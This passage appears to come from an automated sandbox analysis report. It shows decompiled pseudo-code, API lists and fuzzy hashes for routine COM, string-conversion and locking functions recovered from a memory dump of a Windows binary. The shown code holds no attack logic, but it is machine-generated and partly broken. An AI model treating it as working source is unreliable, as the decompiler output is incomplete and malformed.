						_t58 =  *(_t111 - 0x14);
					}
					_t87 =  *((intOrPtr*)(_t111 - 0x1c));
					if(_t87 == 0) {
						_t109 = 0x40181;
					} else {
						_t69 =  *((intOrPtr*)( *_t87 + 0xc))(_t87, _t111 - 0x30);
						_t109 = _t69;
						if(_t69 < 0) {
							_t58 =  *(_t111 - 0x14);
						} else {
							_t70 =  *((intOrPtr*)(_t111 - 0x18));
							_t103 =  *(_t111 - 0x14);
							if(_t70 !=  *(_t111 - 0x14)) {
								E00CB15F2(_t111 - 0x18, _t103, 0xd07e00);
								_t70 =  *((intOrPtr*)(_t111 - 0x18));
							}
							_t82 = __imp__CoTaskMemFree;
							if(_t70 == 0) {
								_t109 = 0x40181;
							} else {
								 *((intOrPtr*)(_t111 - 0x20)) = 0;
								 *((intOrPtr*)( *_t70 + 0x40))(_t70, 2, _t111 - 0x20);
								E00CB6799(_t108, _t111 - 0x28);
								_t75 = _t111 - 0x14;
								_t95 =  <  ? 0x400 :  *((intOrPtr*)(_t111 - 0x28));
								__imp__#417( *((intOrPtr*)(_t111 + 0xc)),  *((intOrPtr*)(_t108 + 0x30)),  *((intOrPtr*)(_t108 + 0x2c)),  *((intOrPtr*)(_t111 - 0x20)), 1, _t75,  *((intOrPtr*)(_t111 - 0x30)),  *((intOrPtr*)(_t111 - 0x2c)),  <  ? 0x400 :  *((intOrPtr*)(_t111 - 0x28)), 0, 0);
								_t109 = _t75;
								 *_t82( *((intOrPtr*)(_t111 - 0x20)));
							}
							 *_t82( *((intOrPtr*)(_t111 - 0x2c)));
							_t58 =  *(_t111 - 0x14);
							_t81 = 0;
						}
					}
					 *(_t111 - 4) = 2;
					if(_t58 != 0) {
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
					L16:
					 *(_t111 - 4) = 1;
					_t59 =  *((intOrPtr*)(_t111 - 0x24));
					if(_t59 != 0) {
						 *((intOrPtr*)( *_t59 + 8))(_t59);
					}
					 *(_t111 - 4) = _t81;
					_t60 =  *((intOrPtr*)(_t111 - 0x18));
					if(_t60 != 0) {
						 *((intOrPtr*)( *_t60 + 8))(_t60);
					}
					 *(_t111 - 4) =  *(_t111 - 4) | 0xffffffff;
					_t88 =  *((intOrPtr*)(_t111 - 0x1c));
					if(_t88 != 0) {
						 *((intOrPtr*)( *_t88 + 8))(_t88);
					}
					return E00CFBEC3(_t109);
				}
				_t79 =  *((intOrPtr*)( *_t55 + 0x24))(_t55);
				_t109 = _t79;
				if(_t79 >= 0) {
					goto L16;
				}
				goto L2;
			}

0x00cb6d55
0x00cb6d55
0x00cb6d5c
0x00cb6d61
0x00cb6d63
0x00cb6d65
0x00cb6d68
0x00cb6d6b
0x00cb6d74
0x00cb6d79
0x00cb6d7d
0x00cb6d82
0x00cb6d94
0x00cb6d94
0x00cb6d97
0x00cb6da8
0x00cb6dab
0x00cb6db1
0x00cb6dbd
0x00cb6dc2
0x00cb6dc5
0x00cb6dc6
0x00cb6dcb
0x00cb6e73
0x00cb6dd1
0x00cb6dd8
0x00cb6ddb
0x00cb6ddf
0x00cb6e6e
0x00cb6de5
0x00cb6de5
0x00cb6de8
0x00cb6ded
0x00cb6df7
0x00cb6dfc
0x00cb6dff
0x00cb6e00
0x00cb6e08
0x00cb6e5d
0x00cb6e0a
0x00cb6e10
0x00cb6e18
0x00cb6e21
0x00cb6e32
0x00cb6e35
0x00cb6e4e
0x00cb6e57
0x00cb6e59
0x00cb6e59
0x00cb6e65
0x00cb6e67
0x00cb6e6a
0x00cb6e6a
0x00cb6ddf
0x00cb6e78
0x00cb6e7e
0x00cb6e83
0x00cb6e83
0x00cb6e86
0x00cb6e86
0x00cb6e8a
0x00cb6e8f
0x00cb6e94
0x00cb6e94
0x00cb6e97
0x00cb6e9a
0x00cb6e9f
0x00cb6ea4
0x00cb6ea4
0x00cb6ea7
0x00cb6eab
0x00cb6eb0
0x00cb6eb5
0x00cb6eb5
0x00cb6ebf
0x00cb6ebf
0x00cb6d87
0x00cb6d8a
0x00cb6d8e
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 00CB6D5C
OleCreatePropertyFrame.OLEAUT32(?,?,?,?,00000001,?,?,?,?,00000000,00000000), ref: 00CB6E4E
CoTaskMemFree.OLE32(?), ref: 00CB6E59
CoTaskMemFree.OLE32(?), ref: 00CB6E65

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeTask$CreateFrameH_prolog3Property
String ID:
API String ID: 3749866304-0
Opcode ID: 5f162c70d29bced6f33f468912c654dc01c3e52703eada5a0ee3c8e0de236da8
Instruction ID: 264f6c73c4b14039b00969f8ff92b782805f62115466010e03ef939fc8f524dc
Opcode Fuzzy Hash: 5f162c70d29bced6f33f468912c654dc01c3e52703eada5a0ee3c8e0de236da8
Instruction Fuzzy Hash: 7C510A75E0024AEFDF15DFA4C994AEEBBB5BF48310F544068E505AB290DB35EE01DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CB53BC, Relevance: 6.1, APIs: 4, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E00CB53BC(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __eflags) {
				signed int _t65;
				signed int _t68;
				signed int _t72;
				signed int _t76;
				signed int _t79;
				signed int _t81;
				signed int _t87;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				intOrPtr _t96;
				intOrPtr* _t99;
				signed int _t100;
				void* _t107;
				signed int _t109;
				signed int _t111;
				signed int _t113;
				signed int _t114;
				void* _t115;
				signed int _t118;

				_t94 = __ecx;
				_push(0x14);
				E00CFBEFA(0xcfcc7d, __ebx, __edi);
				 *(_t115 - 0x1c) = _t94;
				_t114 =  *(_t115 + 8);
				_push(_t115 - 0x18);
				_push(_t114);
				if( *((intOrPtr*)( *_t114 + 0xc))() < 0) {
					L19:
					_t65 = 0;
					__eflags = 0;
				} else {
					_t113 = 0;
					 *(_t115 - 0x14) = 0;
					_t109 = 0xc;
					_t92 =  *( *((intOrPtr*)(_t115 - 0x18)) + 0x2c) & 0x0000ffff;
					_t68 =  *(_t115 - 0x1c);
					 *(_t68 + 0x14) =  *(_t68 + 0x14) & 0;
					 *(_t68 + 0x18) = _t92;
					_t118 = _t92;
					if(_t118 == 0) {
						L7:
						_t93 =  *(_t115 - 0x1c);
						_t96 = 0;
						 *((intOrPtr*)(_t115 - 0x20)) = 0;
						__eflags =  *(_t93 + 0x18);
						if( *(_t93 + 0x18) > 0) {
							 *(_t115 + 8) = _t113;
							do {
								_t72 =  *((intOrPtr*)( *_t114 + 0x14))(_t114, _t96, _t115 - 0x10);
								__eflags = _t72;
								if(_t72 >= 0) {
									 *(_t115 + 8) = 0;
									 *(_t115 - 4) = 1;
									_t76 =  *((intOrPtr*)( *_t114 + 0x30))(_t114,  *((intOrPtr*)( *((intOrPtr*)(_t115 - 0x10)))), _t115 + 8, 0, 0, 0);
									__eflags = _t76;
									if(_t76 < 0) {
										_t99 =  *((intOrPtr*)(_t115 - 0x10));
									} else {
										_t100 =  *(_t115 + 8);
										 *(_t115 + 8) =  *(_t115 + 8) & 0x00000000;
										_t79 =  *_t113;
										 *(_t115 - 0x1c) = _t100;
										__eflags = _t79 - _t100;
										if(_t79 != _t100) {
											__imp__#6(_t79);
											_t79 =  *(_t115 - 0x1c);
											 *_t113 = _t79;
										}
										__imp__#7(_t79);
										_t99 =  *((intOrPtr*)(_t115 - 0x10));
										 *(_t113 + 4) = _t79;
										 *((intOrPtr*)(_t113 + 8)) =  *_t99;
									}
									 *((intOrPtr*)( *_t114 + 0x50))(_t114, _t99);
									_t51 = _t115 - 4;
									 *_t51 =  *(_t115 - 4) | 0xffffffff;
									__eflags =  *_t51;
									__imp__#6( *(_t115 + 8));
								}
								_t113 = _t113 + 0xc;
								_t96 =  *((intOrPtr*)(_t115 - 0x20)) + 1;
								 *((intOrPtr*)(_t115 - 0x20)) = _t96;
								__eflags = _t96 -  *(_t93 + 0x18);
							} while (_t96 <  *(_t93 + 0x18));
							_t113 =  *(_t115 - 0x14);
						}
						 *(_t93 + 0x14) = _t113;
						 *((intOrPtr*)( *_t114 + 0x4c))(_t114,  *((intOrPtr*)(_t115 - 0x18)));
						goto L19;
					} else {
						_t81 = _t92;
						_t111 = _t81 * _t109 >> 0x20;
						_push(0xd006f4);
						_push( ~(0 | _t118 > 0x00000000) | ( ~(0 | _t118 > 0x00000000) | _t81 * _t109) + 0x00000004);
						_t87 = E00CBE7F6();
						_pop(_t107);
						 *(_t115 + 8) = _t87;
						 *(_t115 - 4) =  *(_t115 - 4) & 0;
						_t119 = _t87;
						if(_t87 == 0) {
							_t113 = 0;
							__eflags = 0;
							 *(_t115 - 0x14) = 0;
						} else {
							_push(0xcb5577);
							_push(0xcb5244);
							_push(_t92);
							_t23 = _t87 + 4; // 0x4
							_t113 = _t23;
							 *_t87 = _t92;
							_push(0xc);
							_push(_t113);
							 *(_t115 - 0x14) = _t113;
							E00CBE82E(_t107, _t111, _t119);
						}
						 *(_t115 - 4) =  *(_t115 - 4) | 0xffffffff;
						if(_t113 != 0) {
							goto L7;
						} else {
							 *((intOrPtr*)( *_t114 + 0x4c))(_t114,  *((intOrPtr*)(_t115 - 0x18)));
							_t65 = 0x8007000e;
						}
					}
				}
				return E00CFBEC3(_t65);
			}

0x00cb53bc
0x00cb53bc
0x00cb53c3
0x00cb53c8
0x00cb53cb
0x00cb53d1
0x00cb53d2
0x00cb53da
0x00cb5517
0x00cb5517
0x00cb5517
0x00cb53e0
0x00cb53e3
0x00cb53e7
0x00cb53ea
0x00cb53eb
0x00cb53ef
0x00cb53f2
0x00cb53f5
0x00cb53f8
0x00cb53fa
0x00cb5469
0x00cb5469
0x00cb546c
0x00cb546e
0x00cb5471
0x00cb5474
0x00cb547a
0x00cb547d
0x00cb5485
0x00cb5488
0x00cb548a
0x00cb548e
0x00cb5494
0x00cb54a7
0x00cb54aa
0x00cb54ac
0x00cb54de
0x00cb54ae
0x00cb54ae
0x00cb54b1
0x00cb54b5
0x00cb54b7
0x00cb54ba
0x00cb54bc
0x00cb54bf
0x00cb54c5
0x00cb54c8
0x00cb54c8
0x00cb54cb
0x00cb54d1
0x00cb54d4
0x00cb54d9
0x00cb54d9
0x00cb54e5
0x00cb54e8
0x00cb54e8
0x00cb54e8
0x00cb54ef
0x00cb54ef
0x00cb54f8
0x00cb54fb
0x00cb54fc
0x00cb54ff
0x00cb54ff
0x00cb5508
0x00cb5508
0x00cb550e
0x00cb5514
0x00000000
0x00cb53fc
0x00cb53fe
0x00cb5400
0x00cb5402
0x00cb541a
0x00cb541b
0x00cb5421
0x00cb5422
0x00cb5425
0x00cb5428
0x00cb542a
0x00cb5449
0x00cb5449
0x00cb544b
0x00cb542c
0x00cb542c
0x00cb5431
0x00cb5436
0x00cb5437
0x00cb5437
0x00cb543a
0x00cb543c
0x00cb543e
0x00cb543f
0x00cb5442
0x00cb5442
0x00cb544e
0x00cb5454
0x00000000
0x00cb5456
0x00cb545c
0x00cb545f
0x00cb545f
0x00cb5454
0x00cb53fa
0x00cb551e

APIs

__EH_prolog3.LIBCMT ref: 00CB53C3
SysFreeString.OLEAUT32(00000000), ref: 00CB54BF
SysStringLen.OLEAUT32(00000000), ref: 00CB54CB
SysFreeString.OLEAUT32(?), ref: 00CB54EF

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$H_prolog3
String ID:
API String ID: 2834181473-0
Opcode ID: 9a2ecd49cc7bb989bab009a11ad15c19a1bc7d29a702d73913b69381f26e3e0d
Instruction ID: 7c902078358dffc1dbe9d1435b7f9f90d08292e561dc36132105843ada043892
Opcode Fuzzy Hash: 9a2ecd49cc7bb989bab009a11ad15c19a1bc7d29a702d73913b69381f26e3e0d
Instruction Fuzzy Hash: CD414A71A10609EFDB14CFA5C885AAEBBB8FF48311F10801EE915EB250D774DA41CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CB1F80, Relevance: 6.1, APIs: 4, Instructions: 110
comCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00CB1F80(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __eflags) {
				signed int* _t43;
				void* _t44;
				signed int _t46;
				signed int _t48;
				signed int _t50;
				signed int _t52;
				void* _t56;
				void* _t61;
				signed int _t63;
				signed int _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t75;
				intOrPtr* _t76;
				void* _t77;
				void* _t78;

				_t72 = __edx;
				_t66 = __ecx;
				E00CFBF2E(0xcfc997, __ebx, __edi);
				 *((intOrPtr*)(_t77 - 0x2c)) = _t72;
				 *((intOrPtr*)(_t77 - 0x38)) = _t66;
				_t43 =  *(_t77 + 8);
				_t65 = 0;
				_t76 =  *((intOrPtr*)(_t77 + 0xc));
				 *(_t77 - 0x3c) = _t43;
				 *_t43 = 0;
				_t44 = _t77 - 0x24;
				__imp__ReadClassStm(_t66, _t44, 0x30);
				_t75 = _t44;
				if(_t75 < 0) {
					L20:
					return E00CFBED8(_t44, _t65, _t75);
				}
				 *(_t77 - 0x28) = 0;
				 *(_t77 - 4) = 0;
				_t65 =  *((intOrPtr*)(_t77 + 0x10));
				if(_t65 == 0) {
					_t65 =  *((intOrPtr*)(_t77 - 0x2c));
					if(_t76 != 0) {
						_t75 =  *_t76(_t77 - 0x24, _t65, _t77 - 0x28);
					}
					if(_t75 < 0) {
						L17:
						 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
						_t46 =  *(_t77 - 0x28);
						if(_t46 != 0) {
							 *((intOrPtr*)( *_t46 + 8))(_t46);
						}
						_t44 = _t75;
						goto L20;
					} else {
						L10:
						if( *(_t77 - 0x28) != 0) {
							L12:
							 *(_t77 - 0x30) =  *(_t77 - 0x30) & 0x00000000;
							 *(_t77 - 4) = 1;
							_t48 =  *(_t77 - 0x28);
							_t75 =  *((intOrPtr*)( *_t48))(_t48, 0xd07e10, _t77 - 0x30);
							if(_t75 >= 0) {
								_t52 =  *(_t77 - 0x30);
								_t75 =  *((intOrPtr*)( *_t52 + 0x14))(_t52,  *((intOrPtr*)(_t77 - 0x38)));
								if(_t75 >= 0) {
									 *(_t77 - 0x28) =  *(_t77 - 0x28) & 0x00000000;
									 *( *(_t77 - 0x3c)) =  *(_t77 - 0x28);
								}
							}
							 *(_t77 - 4) = 0;
							_t50 =  *(_t77 - 0x30);
							if(_t50 != 0) {
								 *((intOrPtr*)( *_t50 + 8))(_t50);
							}
							goto L17;
						}
						_t56 = _t77 - 0x24;
						__imp__CoCreateInstance(_t56, 0, 0x415, _t65, _t77 - 0x28);
						_t75 = _t56;
						if(_t75 < 0) {
							goto L17;
						}
						goto L12;
					}
				}
				 *(_t77 - 0x34) =  *(_t77 - 0x34) & 0x00000000;
				_t75 = 0x80070005;
				if(_t65 == 0) {
					goto L17;
				} else {
					goto L3;
				}
				while(1) {
					L3:
					_t61 = E00CC0074(_t77 - 0x24, _t76, 0x10);
					_t78 = _t78 + 0xc;
					if(_t61 == 0) {
						break;
					}
					_t76 = _t76 + 0x10;
					_t63 =  *(_t77 - 0x34) + 1;
					 *(_t77 - 0x34) = _t63;
					if(_t63 < _t65) {
						continue;
					} else {
						goto L17;
					}
				}
				_t65 =  *((intOrPtr*)(_t77 - 0x2c));
				goto L10;
			}

0x00cb1f80
0x00cb1f80
0x00cb1f87
0x00cb1f8c
0x00cb1f8f
0x00cb1f92
0x00cb1f95
0x00cb1f97
0x00cb1f9a
0x00cb1f9d
0x00cb1f9f
0x00cb1fa4
0x00cb1faa
0x00cb1fae
0x00cb209b
0x00cb20a0
0x00cb20a0
0x00cb1fb4
0x00cb1fb7
0x00cb1fba
0x00cb1fbf
0x00cb1ffd
0x00cb2002
0x00cb2012
0x00cb2012
0x00cb2016
0x00cb2088
0x00cb2088
0x00cb208c
0x00cb2091
0x00cb2096
0x00cb2096
0x00cb2099
0x00000000
0x00cb2018
0x00cb2018
0x00cb201c
0x00cb203a
0x00cb203a
0x00cb203e
0x00cb2045
0x00cb2053
0x00cb2057
0x00cb2059
0x00cb2065
0x00cb2069
0x00cb2071
0x00cb2075
0x00cb2075
0x00cb2069
0x00cb2077
0x00cb207b
0x00cb2080
0x00cb2085
0x00cb2085
0x00000000
0x00cb2080
0x00cb202a
0x00cb202e
0x00cb2034
0x00cb2038
0x00000000
0x00000000
0x00000000
0x00cb2038
0x00cb2016
0x00cb1fc1
0x00cb1fc5
0x00cb1fcc
0x00000000
0x00000000
0x00000000
0x00000000
0x00cb1fd2
0x00cb1fd2
0x00cb1fd9
0x00cb1fde
0x00cb1fe3
0x00000000
0x00000000
0x00cb1fe8
0x00cb1feb
0x00cb1fec
0x00cb1ff1
0x00000000
0x00cb1ff3
0x00000000
0x00cb1ff3
0x00cb1ff1
0x00cb1ff8
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 00CB1F87
ReadClassStm.OLE32(?,?,00000030,00CB1CF1,?,?,?), ref: 00CB1FA4
_memcmp.LIBVCRUNTIME ref: 00CB1FD9
CoCreateInstance.OLE32(?,00000000,00000415,?,00000000,?,?,?,?,?,?,00000030,00CB1CF1,?,?,?), ref: 00CB202E

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassCreateH_prolog3_InstanceRead_memcmp
String ID:
API String ID: 3097897353-0
Opcode ID: 8fb35bd45e9c762ca1c54a41d2ad75a774ebd9e52351c72df3cec32c2ddb5252
Instruction ID: b2b9058ab9b9acd88228b665eace7bf42dd3f27bd644819a9cc111ad4d201962
Opcode Fuzzy Hash: 8fb35bd45e9c762ca1c54a41d2ad75a774ebd9e52351c72df3cec32c2ddb5252
Instruction Fuzzy Hash: E6414C7190020DAFDB00DFA8D884BEEBBB9AF48311F244468F915EB250DB31DD44DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CBA4C0, Relevance: 6.1, APIs: 4, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00CBA4C0(signed int __eax, void* __ebx, signed int* __ecx, void* __edi, void* __esi, short* _a4, int _a8) {
				int _v8;
				signed int _t15;
				signed int _t17;
				short* _t30;
				signed int _t32;
				int _t34;
				void* _t40;
				void* _t42;
				int _t53;
				int _t56;

				_t15 = __eax;
				_push(__ecx);
				_t30 = _a4;
				_t49 = __ecx;
				if(_t30 != 0) {
					_t17 = E00CDCACF(_t30) + 1;
					_v8 = _t17;
					_t53 = _t17 << 2;
					E00CBB253(_t49, _t53, _t49, _t53,  &(_t49[1]));
					_pop(_t40);
					_t15 = WideCharToMultiByte(_a8, 0, _t30, _v8,  *_t49, _t53, 0, 0);
					_t32 = 0 | _t15 == 0x00000000;
					if(_t15 == 0) {
						_t15 = GetLastError();
						if(_t15 == 0x7a) {
							_t34 = _v8;
							_t56 = WideCharToMultiByte(_a8, 0, _a4, _t34, 0, 0, 0, 0);
							E00CBB253(_t49, _t56, _t49, _t56,  &(_t49[1]));
							_t40 = _t40;
							_t15 = WideCharToMultiByte(_a8, 0, _a4, _t34,  *_t49, _t56, 0, 0);
							asm("sbb ebx, ebx");
							_t32 =  ~_t15 + 1;
						}
					}
					if(_t32 == 0) {
						goto L2;
					} else {
						E00CBB23B( *_t49,  &(_t49[1]));
						_t42 = _t40;
						L00CB142C();
						asm("int3");
						return _t42;
					}
				} else {
					 *__ecx =  *__ecx & _t30;
					L2:
					return _t15;
				}
			}

0x00cba4c0
0x00cba4c3
0x00cba4c5
0x00cba4c9
0x00cba4cd
0x00cba4de
0x00cba4e3
0x00cba4e9
0x00cba4ef
0x00cba4f5
0x00cba50b
0x00cba511
0x00cba516
0x00cba518
0x00cba521
0x00cba523
0x00cba536
0x00cba541
0x00cba547
0x00cba557
0x00cba561
0x00cba563
0x00cba563
0x00cba521
0x00cba567
0x00000000
0x00cba56d
0x00cba573
0x00cba578
0x00cba579
0x00cba57e
0x00cba581
0x00cba581
0x00cba4cf
0x00cba4cf
0x00cba4d1
0x00cba4d4
0x00cba4d4

APIs

WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,00000001,00000000,00000000,?,?,?,?,?,00CB7D6B,?,00000003), ref: 00CBA50B
GetLastError.KERNEL32(?,?,?,?,?,00CB7D6B,?,00000003), ref: 00CBA518
WideCharToMultiByte.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00CB7D6B,?,00000003), ref: 00CBA534
WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,00000000,00000000,00000000,?,?,?,?,?,00CB7D6B,?,00000003), ref: 00CBA557

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 461744da2b7fbffe87aec7b358bda23009c8ad0b7166d2dfead5c8022aaf39e4
Instruction ID: 7e161edd64958ea857bc1184f609a7cc893c4bf17276d4e2825c3ff23d4a002c
Opcode Fuzzy Hash: 461744da2b7fbffe87aec7b358bda23009c8ad0b7166d2dfead5c8022aaf39e4
Instruction Fuzzy Hash: D02193B260021ABFAB149F64DC85DBFBBADEF48250720852AF915C6120DB709E149BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CB4D87, Relevance: 6.1, APIs: 4, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00CB4D87(void* __ecx, void* __edx, intOrPtr _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int* _t19;
				signed int _t20;
				signed int _t21;
				signed int* _t22;
				signed int _t23;
				signed int _t30;
				void* _t34;
				signed int _t40;
				signed int* _t41;
				signed int _t44;

				_push(__ecx);
				_push(__ecx);
				_t19 = _a8;
				_t34 = __edx;
				if(_t19 != 0) {
					 *_t19 =  *_t19 & 0x00000000;
					__eflags =  *0xe3a4b0;
					if( *0xe3a4b0 != 0) {
						_t20 =  *0xe3a4b8; // 0xd0c49c
						_t44 = 0;
						while(1) {
							_v8 = _t20;
							__eflags = _t20 -  *0xe3a4bc; // 0xd0c4a0
							if(__eflags >= 0) {
								break;
							}
							_t40 =  *_t20;
							__eflags = _t40;
							if(_t40 == 0) {
								L9:
								_t20 = _t20 + 4;
								__eflags = _t20;
								continue;
							}
							__eflags =  *((intOrPtr*)(_t40 + 8)) - _t44;
							if( *((intOrPtr*)(_t40 + 8)) == _t44) {
								goto L9;
							}
							_t21 = E00CB10E3(_t34,  *_t40);
							__eflags = _t21;
							if(_t21 != 0) {
								_t22 =  *(_t40 + 0x10);
								_v8 = _t22;
								_t23 =  *_t22;
								__eflags = _t23;
								if(_t23 != 0) {
									L21:
									__imp__DecodePointer(_t23);
									_t41 = _a8;
									_t44 =  *((intOrPtr*)( *_t23))(_t23, _a4, _t41);
									L12:
									__eflags =  *_t41;
									if( *_t41 == 0) {
										__eflags = _t44;
										_t44 =  ==  ? 0x80040111 : _t44;
									}
									return _t44;
								}
								EnterCriticalSection(0xe3a4c0);
								_t44 = 0;
								__eflags =  *_v8;
								if( *_v8 == 0) {
									_v12 = _v12 & 0;
									_t30 =  *((intOrPtr*)(_t40 + 8))( *((intOrPtr*)(_t40 + 0xc)), 0xd07d74,  &_v12);
									_t44 = _t30;
									__eflags = _t44;
									if(_t44 >= 0) {
										__imp__EncodePointer(_v12);
										 *_v8 = _t30;
									}
								}
								LeaveCriticalSection(0xe3a4c0);
								_t23 =  *_v8;
								__eflags = _t23;
								if(_t23 == 0) {
									break;
								} else {
									goto L21;
								}
							}
							_t20 = _v8;
							goto L9;
						}
						_t41 = _a8;
						goto L12;
					}
					return 0x8000ffff;
				}
				return 0x80004003;
			}

0x00cb4d8a
0x00cb4d8b
0x00cb4d8c
0x00cb4d8f
0x00cb4d93
0x00cb4d9c
0x00cb4d9f
0x00cb4da6
0x00cb4daf
0x00cb4db6
0x00cb4dd6
0x00cb4dd6
0x00cb4dd9
0x00cb4ddf
0x00000000
0x00000000
0x00cb4dba
0x00cb4dbc
0x00cb4dbe
0x00cb4dd3
0x00cb4dd3
0x00cb4dd3
0x00000000
0x00cb4dd3
0x00cb4dc0
0x00cb4dc3
0x00000000
0x00000000
0x00cb4dc7
0x00cb4dcc
0x00cb4dce
0x00cb4dfb
0x00cb4dfe
0x00cb4e01
0x00cb4e03
0x00cb4e05
0x00cb4e55
0x00cb4e56
0x00cb4e5c
0x00cb4e68
0x00cb4de4
0x00cb4de4
0x00cb4de7
0x00cb4de9
0x00cb4df0
0x00cb4df0
0x00000000
0x00cb4df6
0x00cb4e0c
0x00cb4e15
0x00cb4e17
0x00cb4e19
0x00cb4e1b
0x00cb4e2a
0x00cb4e2d
0x00cb4e2f
0x00cb4e31
0x00cb4e36
0x00cb4e3f
0x00cb4e3f
0x00cb4e31
0x00cb4e46
0x00cb4e4f
0x00cb4e51
0x00cb4e53
0x00000000
0x00000000
0x00000000
0x00000000
0x00cb4e53
0x00cb4dd0
0x00000000
0x00cb4dd0
0x00cb4de1
0x00000000
0x00cb4de1
0x00000000
0x00cb4da8
0x00000000

APIs

EnterCriticalSection.KERNEL32(00E3A4C0), ref: 00CB4E0C
EncodePointer.KERNEL32(?), ref: 00CB4E36
LeaveCriticalSection.KERNEL32(00E3A4C0), ref: 00CB4E46
DecodePointer.KERNEL32(?), ref: 00CB4E56

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalPointerSection$DecodeEncodeEnterLeave
String ID:
API String ID: 1022840002-0
Opcode ID: 444a7240cfac8df9691617e1523d2f4753eea3ded8085eca13a856a924f87772
Instruction ID: dd951111ca3b8f285c0e676eb9ae6620a242de2e4b099cbcc22d610de2a48278
Opcode Fuzzy Hash: 444a7240cfac8df9691617e1523d2f4753eea3ded8085eca13a856a924f87772
Instruction Fuzzy Hash: 32314A35A04219EFDB259F65C848AADBBB5FF48710F244165E815EB221D370EE40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00CE5A6D, Relevance: 6.1, APIs: 4, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00CE5A6D(void* __ecx) {
				void* __esi;
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				void* _t14;
				signed int _t18;
				long _t21;

				_t14 = __ecx;
				_t21 = GetLastError();
				_t2 =  *0xd0f060; // 0x6
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E00CE358C(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
